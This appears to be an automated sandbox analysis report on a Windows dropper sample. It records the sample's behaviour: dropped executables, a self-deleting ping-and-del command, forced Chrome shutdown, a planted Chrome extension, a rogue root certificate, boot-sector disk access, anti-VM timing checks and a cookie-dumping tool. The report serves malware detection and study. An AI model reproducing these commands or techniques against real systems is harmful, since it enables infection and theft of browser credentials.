Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe File created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Jump to behavior
Source: Cyfj6XGbkd.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1611971443428.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\SysWOW64\msiexec.exe File read: C:\Windows\win.ini Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: Cyfj6XGbkd.exe Virustotal: Detection: 40%
Source: Cyfj6XGbkd.exe Metadefender: Detection: 24%
Source: Cyfj6XGbkd.exe ReversingLabs: Detection: 58%
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe File read: C:\Users\user\Desktop\Cyfj6XGbkd.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Cyfj6XGbkd.exe 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Source: unknown Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01
Source: unknown Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F759AAE600C1266B09FA365BCB174CA6 C
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Users\user\AppData\Roaming\1611971443428.exe 'C:\Users\user\AppData\Roaming\1611971443428.exe' /sjson 'C:\Users\user\AppData\Roaming\1611971443428.txt'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: unknown Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Process created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01 Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Process created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01 Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Process created: C:\Users\user\AppData\Roaming\1611971443428.exe 'C:\Users\user\AppData\Roaming\1611971443428.exe' /sjson 'C:\Users\user\AppData\Roaming\1611971443428.txt' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\msiexec.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe Automated click: Install
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Cyfj6XGbkd.exe Static file information: File size 4247224 > 1048576
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Jump to behavior
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611971443428.exe, 00000008.00000000.254487311.000000000040F000.00000002.00020000.sdmp, 1611971443428.exe.2.dr
Source: Binary string: atl71.pdbT source: atl71.dll.2.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.2.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.2.dr
Source: Binary string: atl71.pdb source: atl71.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001C.00000000.316118028.0000000000F4C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSIB2E9.tmp.1.dr

Data Obfuscation:

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Unpacked PE file: 0.2.Cyfj6XGbkd.exe.2880000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Unpacked PE file: 4.2.56BB1610C0318054.exe.2620000.5.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00408D68 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00408D68
PE file contains an invalid checksum
Source: Cyfj6XGbkd.exe Static PE information: real checksum: 0xd69e9 should be: 0x41116d
Source: MSIB2E9.tmp.1.dr Static PE information: real checksum: 0x0 should be: 0x2d22
Source: 56BB1610C0318054.exe.0.dr Static PE information: real checksum: 0xd69e9 should be: 0x41116d
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_004038A0 push eax; ret 0_2_004038CE
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10010579 push ecx; ret 0_2_1001058C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 1_2_050AE024 push 00000078h; ret 1_2_050AE026
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 1_2_079BF4DC pushad ; iretd 1_2_079BF599
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 1_2_079BDD50 push 00000078h; ret 1_2_079BDD52
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 1_2_07A3F664 push 4801013Bh; retf 1_2_07A3F669
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_3_0311EDF7 push es; retf 2_3_0311F080
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10010579 push ecx; ret 2_2_1001058C
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_0040E2F1 push ecx; ret 8_2_0040E301
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_0040E340 push eax; ret 8_2_0040E354
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_0040E340 push eax; ret 8_2_0040E37C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F43FB5 push ecx; ret 28_2_00F43FC8

Persistence and Installation Behavior:

barindex
Contains functionality to infect the boot sector
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d 0_2_1001DA70
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d 0_2_1001D7E0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 0_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d 2_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 2_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d 2_2_1001D7E0
Installs new ROOT certificates
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob Jump to behavior
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Roaming\1611971443428.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Temp\download\download_engine.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll Jump to dropped file
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe File created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Temp\download\atl71.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Temp\xldl.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSIB2E9.tmp Jump to dropped file
Installs a Chrome extension
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\icon.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\icon48.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\popup.html Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\background.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\book.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\jquery-1.8.3.min.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\popup.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\manifest.json Jump to behavior

Boot Survival:

barindex
Contains functionality to infect the boot sector
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d 0_2_1001DA70
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d 0_2_1001D7E0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 0_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d 2_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 2_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d 2_2_1001D7E0

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 8_2_0040C41D
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\msiexec.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_100204C0 0_2_100204C0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_100204C0 2_2_100204C0
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403BD4 second address: 0000000000403BDA instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403BDA second address: 0000000000403BFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403BFC second address: 0000000000403C02 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403C02 second address: 0000000000403C23 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 00403F45h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403C23 second address: 0000000000403C29 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403C29 second address: 0000000000403C43 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403C43 second address: 0000000000403C49 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403C49 second address: 0000000000403C6C instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC881h 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403C6C second address: 0000000000403C72 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403C72 second address: 0000000000403C92 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 00404779h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
